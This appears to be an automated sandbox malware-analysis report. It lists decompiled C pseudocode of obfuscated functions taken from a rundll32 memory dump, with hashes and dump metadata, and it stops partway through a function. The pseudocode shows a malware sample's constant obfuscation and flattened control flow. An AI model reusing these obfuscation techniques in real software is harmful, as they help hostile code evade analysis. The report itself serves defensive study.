                                                                                                                      • Instruction Fuzzy Hash: B64189B160C3028BC718CE25D59556FBAF1EFD4708F148A2EF59A56260D3B4CA09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00176C29() {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				void* _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t89;
                                                                                                                      				intOrPtr _t98;
                                                                                                                      				signed int _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t105;
                                                                                                                      
                                                                                                                      				_v48 = 0xcb88bc;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t102 = 0x47;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t89 = 0xf0122cf;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v16 = 0x79c750;
                                                                                                                      				_v16 = _v16 + 0x2192;
                                                                                                                      				_v16 = _v16 ^ 0x37fffb71;
                                                                                                                      				_v16 = _v16 + 0xffff9df1;
                                                                                                                      				_v16 = _v16 ^ 0x3784de23;
                                                                                                                      				_v12 = 0x72aa7c;
                                                                                                                      				_v12 = _v12 * 0x4d;
                                                                                                                      				_v12 = _v12 + 0x37d5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x02292cf3;
                                                                                                                      				_v8 = 0x96e633;
                                                                                                                      				_v8 = _v8 ^ 0x4b98ff22;
                                                                                                                      				_v8 = _v8 ^ 0x9d1458e0;
                                                                                                                      				_v8 = _v8 | 0xdef8ea17;
                                                                                                                      				_v8 = _v8 ^ 0xdef824a2;
                                                                                                                      				_v28 = 0x117d;
                                                                                                                      				_v28 = _v28 / _t102;
                                                                                                                      				_v28 = _v28 >> 0x10;
                                                                                                                      				_v28 = _v28 ^ 0x00058012;
                                                                                                                      				_v24 = 0x3d67df;
                                                                                                                      				_v24 = _v24 | 0x442c4c66;
                                                                                                                      				_t44 =  &_v24; // 0x442c4c66
                                                                                                                      				_t103 = 0x76;
                                                                                                                      				_v24 =  *_t44 / _t103;
                                                                                                                      				_v24 = _v24 ^ 0x009d94f1;
                                                                                                                      				_v32 = 0x4e376f;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_v32 = _v32 ^ 0xc6ef13b7;
                                                                                                                      				_v20 = 0x3e602c;
                                                                                                                      				_v20 = _v20 ^ 0x8d0d4ca7;
                                                                                                                      				_v20 = _v20 << 6;
                                                                                                                      				_v20 = _v20 * 0x6d;
                                                                                                                      				_v20 = _v20 ^ 0xb2734839;
                                                                                                                      				do {
                                                                                                                      					while(_t89 != 0x600d2ee) {
                                                                                                                      						if(_t89 == 0xf0122cf) {
                                                                                                                      							_push(_t89);
                                                                                                                      							_push(_t89);
                                                                                                                      							 *0x195210 = E00183512(0x138);
                                                                                                                      							_t89 = 0x600d2ee;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L5;
                                                                                                                      					}
                                                                                                                      					_t98 =  *0x195210; // 0x0
                                                                                                                      					E0018A156(_v28, _t98 + 0x1c, _v24, _v32, _v20);
                                                                                                                      					_t105 = _t105 + 0xc;
                                                                                                                      					_t89 = 0x7d77246;
                                                                                                                      					L5:
                                                                                                                      				} while (_t89 != 0x7d77246);
                                                                                                                      				return 1;
                                                                                                                      			}


















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,`>$fL,D$o7N
                                                                                                                      • API String ID: 0-3130479144
                                                                                                                      • Opcode ID: be2af31fe57058f69e52f37f60932d10dad2aa2117ec0486d88ce01ab4a0d4f9
                                                                                                                      • Instruction ID: 465bc3586fe93e07ddc8f3fdc3e280c59f4232d0da8212a89b54b64666643336
                                                                                                                      • Opcode Fuzzy Hash: be2af31fe57058f69e52f37f60932d10dad2aa2117ec0486d88ce01ab4a0d4f9
                                                                                                                      • Instruction Fuzzy Hash: 714144B1E0020AEBDF49CFA8C9864EEBBB1FF54314F208559D521A6260E3B40B44CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00176ED6(intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t87;
                                                                                                                      				void* _t89;
                                                                                                                      				intOrPtr* _t90;
                                                                                                                      				signed int _t93;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      
                                                                                                                      				_v48 = 0x387a4d;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_v24 = 0x2424c8;
                                                                                                                      				_v24 = _v24 ^ 0x2613c361;
                                                                                                                      				_t93 = 0x67;
                                                                                                                      				_t104 = _a4;
                                                                                                                      				_v24 = _v24 * 0x39;
                                                                                                                      				_v24 = _v24 ^ 0x8272caac;
                                                                                                                      				_v8 = 0x1db7b6;
                                                                                                                      				_v8 = _v8 * 0x22;
                                                                                                                      				_v8 = _v8 + 0xffff08c1;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0x7e2ce57a;
                                                                                                                      				_v32 = 0xc3f5b3;
                                                                                                                      				_v32 = _v32 * 0x7f;
                                                                                                                      				_v32 = _v32 ^ 0x61389900;
                                                                                                                      				_v12 = 0x2d74a5;
                                                                                                                      				_v12 = _v12 / _t93;
                                                                                                                      				_v12 = _v12 + 0xffffbd08;
                                                                                                                      				_v12 = _v12 * 0x6a;
                                                                                                                      				_v12 = _v12 ^ 0x0019f3c3;
                                                                                                                      				_v28 = 0x7d8734;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 << 1;
                                                                                                                      				_v28 = _v28 ^ 0x000207bd;
                                                                                                                      				_v20 = 0x79f3b3;
                                                                                                                      				_v20 = _v20 | 0xe743018d;
                                                                                                                      				_v20 = _v20 + 0xb3b6;
                                                                                                                      				_v20 = _v20 + 0x51ad;
                                                                                                                      				_v20 = _v20 ^ 0xe775faa1;
                                                                                                                      				_v36 = 0x6d6a5a;
                                                                                                                      				_v36 = _v36 << 0xd;
                                                                                                                      				_v36 = _v36 ^ 0xad48a6bc;
                                                                                                                      				_v16 = 0x62a4bc;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 * 0x38;
                                                                                                                      				_v16 = _v16 ^ 0xac926db4;
                                                                                                                      				_t87 =  *((intOrPtr*)(_t104 + 0xc))( *((intOrPtr*)(_t104 + 0x30)), 1, 0);
                                                                                                                      				_t109 = _t87;
                                                                                                                      				if(_t87 != 0) {
                                                                                                                      					_push(0x17188c);
                                                                                                                      					_push(_v32);
                                                                                                                      					_t72 =  &_v8; // 0x7e2ce57a
                                                                                                                      					_t89 = E0017BB4B(_v24,  *_t72, _t109);
                                                                                                                      					_push( *((intOrPtr*)(_t104 + 0x30)));
                                                                                                                      					_t106 = _t89;
                                                                                                                      					_push(_v28);
                                                                                                                      					_t90 = E00189861(_v12, _t89);
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						 *_t90();
                                                                                                                      					}
                                                                                                                      					E0017AE03(_v20, _v36, _v16, _t106);
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Mz8$Zjm$z,~
                                                                                                                      • API String ID: 0-2456983437
                                                                                                                      • Opcode ID: bf03b490bbac42444789797d7569fe9e421a7cf82d863269f6cf3f46f779bc94
                                                                                                                      • Instruction ID: 2895aea23890a3594c39308e8d48d5d89246938ce7dbd01326a82aff6090f65a
                                                                                                                      • Opcode Fuzzy Hash: bf03b490bbac42444789797d7569fe9e421a7cf82d863269f6cf3f46f779bc94
                                                                                                                      • Instruction Fuzzy Hash: CA41F071D0031AABCF08CFA5C98A8EEBBB5FB44314F208159D821B6250D7B95B55CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00193672() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _t69;
                                                                                                                      				intOrPtr _t71;
                                                                                                                      
                                                                                                                      				_v16 = 0x1920f4;
                                                                                                                      				_v16 = _v16 | 0xcc0e70e0;
                                                                                                                      				_v16 = _v16 + 0xffff67e9;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x00056687;
                                                                                                                      				_v12 = 0xe97d2f;
                                                                                                                      				_v12 = _v12 * 5;
                                                                                                                      				_v12 = _v12 + 0xdb12;
                                                                                                                      				_v12 = _v12 ^ 0x6ef3d177;
                                                                                                                      				_v12 = _v12 ^ 0x6a6f4e7b;
                                                                                                                      				_v8 = 0xee58e5;
                                                                                                                      				_v8 = _v8 + 0xffff20e4;
                                                                                                                      				_v8 = _v8 + 0x2db7;
                                                                                                                      				_v8 = _v8 + 0xffff706b;
                                                                                                                      				_v8 = _v8 ^ 0x00e27cba;
                                                                                                                      				_v24 = 0x674fea;
                                                                                                                      				_v24 = _v24 << 0xd;
                                                                                                                      				_v24 = _v24 << 0xe;
                                                                                                                      				_v24 = _v24 + 0xffff2a40;
                                                                                                                      				_v24 = _v24 ^ 0x4ff265ad;
                                                                                                                      				_v32 = 0x2c6dbe;
                                                                                                                      				_v32 = _v32 >> 2;
                                                                                                                      				_v32 = _v32 ^ 0x000c65e7;
                                                                                                                      				_v20 = 0xd3ac82;
                                                                                                                      				_v20 = _v20 * 0x77;
                                                                                                                      				_v20 = _v20 << 0xc;
                                                                                                                      				_v20 = _v20 + 0x1c1c;
                                                                                                                      				_v20 = _v20 ^ 0x53000be4;
                                                                                                                      				_v28 = 0xd3eaf5;
                                                                                                                      				_v28 = _v28 ^ 0xd0f82d1e;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0x57832eb1;
                                                                                                                      				_t69 =  *0x195c9c; // 0x0
                                                                                                                      				E0018E884(_v16, _v12, _v8,  *((intOrPtr*)(_t69 + 0x50)));
                                                                                                                      				_t71 =  *0x195c9c; // 0x0
                                                                                                                      				return E001768DE(_v24, _v32, _v20, _v28,  *((intOrPtr*)(_t71 + 0x58)));
                                                                                                                      			}













                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {Noj$Og$X
                                                                                                                      • API String ID: 0-3024020846
                                                                                                                      • Opcode ID: aefa4bcebb740245b96333660443710362b469cd2a29653bccd9c0d469bcc836
                                                                                                                      • Instruction ID: fa4cab48695d7e46e0f054c8c21d8c0a39f43f58e30efac97727e846c49e3525
                                                                                                                      • Opcode Fuzzy Hash: aefa4bcebb740245b96333660443710362b469cd2a29653bccd9c0d469bcc836
                                                                                                                      • Instruction Fuzzy Hash: 9D31C1B2C0070AEBCF45DFE4C94A8AEFBB0BB10308F208189D51176261D7B44B49CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0017CA43(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t229;
                                                                                                                      				void* _t247;
                                                                                                                      				void* _t251;
                                                                                                                      				void* _t257;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t263;
                                                                                                                      				intOrPtr _t288;
                                                                                                                      				signed int _t289;
                                                                                                                      				signed int _t290;
                                                                                                                      				signed int _t291;
                                                                                                                      				signed int _t292;
                                                                                                                      				void* _t294;
                                                                                                                      				void* _t295;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t287 = _a12;
                                                                                                                      				_t261 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t229);
                                                                                                                      				_v64 = 0x836860;
                                                                                                                      				_t288 = 0;
                                                                                                                      				_v60 = 0x763ad4;
                                                                                                                      				_t295 = _t294 + 0x18;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v132 = 0xf23cd2;
                                                                                                                      				_t263 = 0x1cd9a3d;
                                                                                                                      				_v132 = _v132 + 0xffff66b2;
                                                                                                                      				_v132 = _v132 + 0xffff69fc;
                                                                                                                      				_v132 = _v132 << 8;
                                                                                                                      				_v132 = _v132 ^ 0xf1039f05;
                                                                                                                      				_v140 = 0x375552;
                                                                                                                      				_v140 = _v140 << 6;
                                                                                                                      				_v140 = _v140 ^ 0xd2a5ef1f;
                                                                                                                      				_v140 = _v140 >> 0xb;
                                                                                                                      				_v140 = _v140 ^ 0x00122384;
                                                                                                                      				_v108 = 0x5e168a;
                                                                                                                      				_v108 = _v108 >> 0x10;
                                                                                                                      				_v108 = _v108 + 0xda32;
                                                                                                                      				_v108 = _v108 ^ 0x00005a0c;
                                                                                                                      				_v116 = 0x4fe29d;
                                                                                                                      				_v116 = _v116 >> 0x10;
                                                                                                                      				_v116 = _v116 << 4;
                                                                                                                      				_v116 = _v116 ^ 0x0003d351;
                                                                                                                      				_v88 = 0xa9a316;
                                                                                                                      				_v88 = _v88 + 0xe91b;
                                                                                                                      				_v88 = _v88 ^ 0x00a1e0df;
                                                                                                                      				_v136 = 0x77a290;
                                                                                                                      				_v136 = _v136 << 0xc;
                                                                                                                      				_t289 = 0x74;
                                                                                                                      				_v136 = _v136 / _t289;
                                                                                                                      				_v136 = _v136 + 0xffff257b;
                                                                                                                      				_v136 = _v136 ^ 0x01061e79;
                                                                                                                      				_v152 = 0x936910;
                                                                                                                      				_v152 = _v152 * 0x7a;
                                                                                                                      				_v152 = _v152 >> 3;
                                                                                                                      				_v152 = _v152 + 0xffff8db3;
                                                                                                                      				_v152 = _v152 ^ 0x08cdb86a;
                                                                                                                      				_v128 = 0x509c4c;
                                                                                                                      				_v128 = _v128 + 0x81f1;
                                                                                                                      				_v128 = _v128 + 0x9dbc;
                                                                                                                      				_v128 = _v128 >> 5;
                                                                                                                      				_v128 = _v128 ^ 0x00071675;
                                                                                                                      				_v148 = 0xcab80c;
                                                                                                                      				_v148 = _v148 >> 0xd;
                                                                                                                      				_v148 = _v148 | 0x660debd0;
                                                                                                                      				_v148 = _v148 + 0xf630;
                                                                                                                      				_v148 = _v148 ^ 0x660fbc32;
                                                                                                                      				_v104 = 0xc88284;
                                                                                                                      				_v104 = _v104 ^ 0xe0b202bb;
                                                                                                                      				_v104 = _v104 * 0x70;
                                                                                                                      				_v104 = _v104 ^ 0x35911582;
                                                                                                                      				_v84 = 0x688efd;
                                                                                                                      				_v84 = _v84 ^ 0xa5781683;
                                                                                                                      				_v84 = _v84 ^ 0xa515c2ff;
                                                                                                                      				_v156 = 0x3b8040;
                                                                                                                      				_v156 = _v156 | 0xffdbffba;
                                                                                                                      				_v156 = _v156 ^ 0xfff6b3f0;
                                                                                                                      				_v72 = 0x8d74e9;
                                                                                                                      				_v72 = _v72 >> 8;
                                                                                                                      				_v72 = _v72 ^ 0x0004dfda;
                                                                                                                      				_v160 = 0xbd1b1c;
                                                                                                                      				_v160 = _v160 << 0xc;
                                                                                                                      				_v160 = _v160 | 0x33bb8ca8;
                                                                                                                      				_v160 = _v160 ^ 0xcf7854ed;
                                                                                                                      				_v160 = _v160 ^ 0x3ccd45a9;
                                                                                                                      				_v120 = 0x48e6fb;
                                                                                                                      				_v120 = _v120 | 0xe61fffb2;
                                                                                                                      				_v120 = _v120 ^ 0xe6598779;
                                                                                                                      				_v68 = 0x77306;
                                                                                                                      				_v68 = _v68 >> 6;
                                                                                                                      				_v68 = _v68 ^ 0x0008dc17;
                                                                                                                      				_v112 = 0x774006;
                                                                                                                      				_v112 = _v112 << 0xd;
                                                                                                                      				_v112 = _v112 + 0xffffb426;
                                                                                                                      				_v112 = _v112 ^ 0xe80ab914;
                                                                                                                      				_v144 = 0x2b5eea;
                                                                                                                      				_t290 = 0x79;
                                                                                                                      				_v144 = _v144 * 0x59;
                                                                                                                      				_v144 = _v144 + 0xffffa818;
                                                                                                                      				_v144 = _v144 ^ 0xb076c16e;
                                                                                                                      				_v144 = _v144 ^ 0xbf611da3;
                                                                                                                      				_v96 = 0xa17410;
                                                                                                                      				_v96 = _v96 | 0x939b80d1;
                                                                                                                      				_v96 = _v96 / _t290;
                                                                                                                      				_v96 = _v96 ^ 0x01375591;
                                                                                                                      				_v80 = 0xb3b8;
                                                                                                                      				_t291 = 0x5c;
                                                                                                                      				_v80 = _v80 / _t291;
                                                                                                                      				_v80 = _v80 ^ 0x0003830b;
                                                                                                                      				_v76 = 0xc52b4a;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 ^ 0x00071242;
                                                                                                                      				_v92 = 0xc8fd49;
                                                                                                                      				_t292 = 0x54;
                                                                                                                      				_v92 = _v92 / _t292;
                                                                                                                      				_v92 = _v92 ^ 0x044db90d;
                                                                                                                      				_v92 = _v92 ^ 0x044d9acc;
                                                                                                                      				_v100 = 0x5afe59;
                                                                                                                      				_v100 = _v100 ^ 0x0de7f0e8;
                                                                                                                      				_v100 = _v100 | 0x5cb6a54b;
                                                                                                                      				_v100 = _v100 ^ 0x5db2bb74;
                                                                                                                      				_v124 = 0xa19aac;
                                                                                                                      				_v124 = _v124 + 0xffff97b1;
                                                                                                                      				_v124 = _v124 * 0x3e;
                                                                                                                      				_v124 = _v124 >> 0xe;
                                                                                                                      				_v124 = _v124 ^ 0x000bad60;
                                                                                                                      				while(_t263 != 0xd5ede2) {
                                                                                                                      					if(_t263 == 0x1cd9a3d) {
                                                                                                                      						_t263 = 0xd5ede2;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t263 == 0x72d0ec7) {
                                                                                                                      							_t247 = E0017B09F(_v148, _v104,  &_v52, _v84, _t287 + 8, _v156);
                                                                                                                      							_t295 = _t295 + 0x10;
                                                                                                                      							__eflags = _t247;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t263 = 0x78e1ae6;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t263 == 0x78e1ae6) {
                                                                                                                      								_t251 = E0017B09F(_v72, _v160,  &_v52, _v120, _t287 + 0xc, _v68);
                                                                                                                      								_t295 = _t295 + 0x10;
                                                                                                                      								__eflags = _t251;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t263 = 0xabcd4f8;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t263 == 0x7ae58b3) {
                                                                                                                      									__eflags = E0018B9B1(_v76, _v92, __eflags, _t287 + 0x2c, _v100,  &_v52, _v124);
                                                                                                                      									_t288 =  !=  ? 1 : _t288;
                                                                                                                      								} else {
                                                                                                                      									if(_t263 == 0xabcd4f8) {
                                                                                                                      										_t257 = E0017B09F(_v112, _v144,  &_v52, _v96, _t287 + 0x40, _v80);
                                                                                                                      										_t295 = _t295 + 0x10;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t263 = 0x7ae58b3;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t263 != 0xc0b979a) {
                                                                                                                      											L18:
                                                                                                                      											__eflags = _t263 - 0x38140c5;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t260 = E0017B09F(_v88, _v136,  &_v52, _v152, _t287 + 0x38, _v128);
                                                                                                                      											_t295 = _t295 + 0x10;
                                                                                                                      											if(_t260 != 0) {
                                                                                                                      												_t263 = 0x72d0ec7;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t288;
                                                                                                                      				}
                                                                                                                      				E001864C5(_v132, _v140, _v108, _v116, _t261,  &_v52);
                                                                                                                      				_t295 = _t295 + 0x10;
                                                                                                                      				_t263 = 0xc0b979a;
                                                                                                                      				goto L18;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RU7$^+
                                                                                                                      • API String ID: 0-4228232731
                                                                                                                      • Opcode ID: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction ID: 50360c7b0ad7406a4b92d552592e47476c153b9f3afc374416828a5b19d163f8
                                                                                                                      • Opcode Fuzzy Hash: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction Fuzzy Hash: CBC110711083859FD768CE61C88991BFBF5FBC4388F10891DF69A86260D7B58949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0018BE8C() {
                                                                                                                      				char _v524;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				char _v564;
                                                                                                                      				void* _v576;
                                                                                                                      				intOrPtr _v580;
                                                                                                                      				intOrPtr _v584;
                                                                                                                      				char _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _t217;
                                                                                                                      				signed int _t223;
                                                                                                                      				void* _t224;
                                                                                                                      				void* _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t248;
                                                                                                                      				void* _t251;
                                                                                                                      				void* _t256;
                                                                                                                      				void* _t258;
                                                                                                                      
                                                                                                                      				_v580 = 0x2596f5;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t227 = 0;
                                                                                                                      				_t229 = 0x1e;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t251 = 0x1d7b34c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v624 = 0x892a55;
                                                                                                                      				_v624 = _v624 | 0xee7fd748;
                                                                                                                      				_v624 = _v624 ^ 0xeeffffdd;
                                                                                                                      				_v620 = 0x622f6;
                                                                                                                      				_v620 = _v620 + 0xbb0c;
                                                                                                                      				_v620 = _v620 + 0xffff07a8;
                                                                                                                      				_v620 = _v620 ^ 0x0005e5ab;
                                                                                                                      				_v632 = 0xb1aa42;
                                                                                                                      				_v632 = _v632 + 0xffffd879;
                                                                                                                      				_v632 = _v632 << 7;
                                                                                                                      				_v632 = _v632 ^ 0x58c15d83;
                                                                                                                      				_v668 = 0xaf491c;
                                                                                                                      				_v668 = _v668 | 0xa282f1df;
                                                                                                                      				_v668 = _v668 * 0x52;
                                                                                                                      				_v668 = _v668 ^ 0xbc704b9b;
                                                                                                                      				_v668 = _v668 ^ 0xa02fbf7e;
                                                                                                                      				_v604 = 0x754ed8;
                                                                                                                      				_v604 = _v604 / _t229;
                                                                                                                      				_v604 = _v604 ^ 0x00089259;
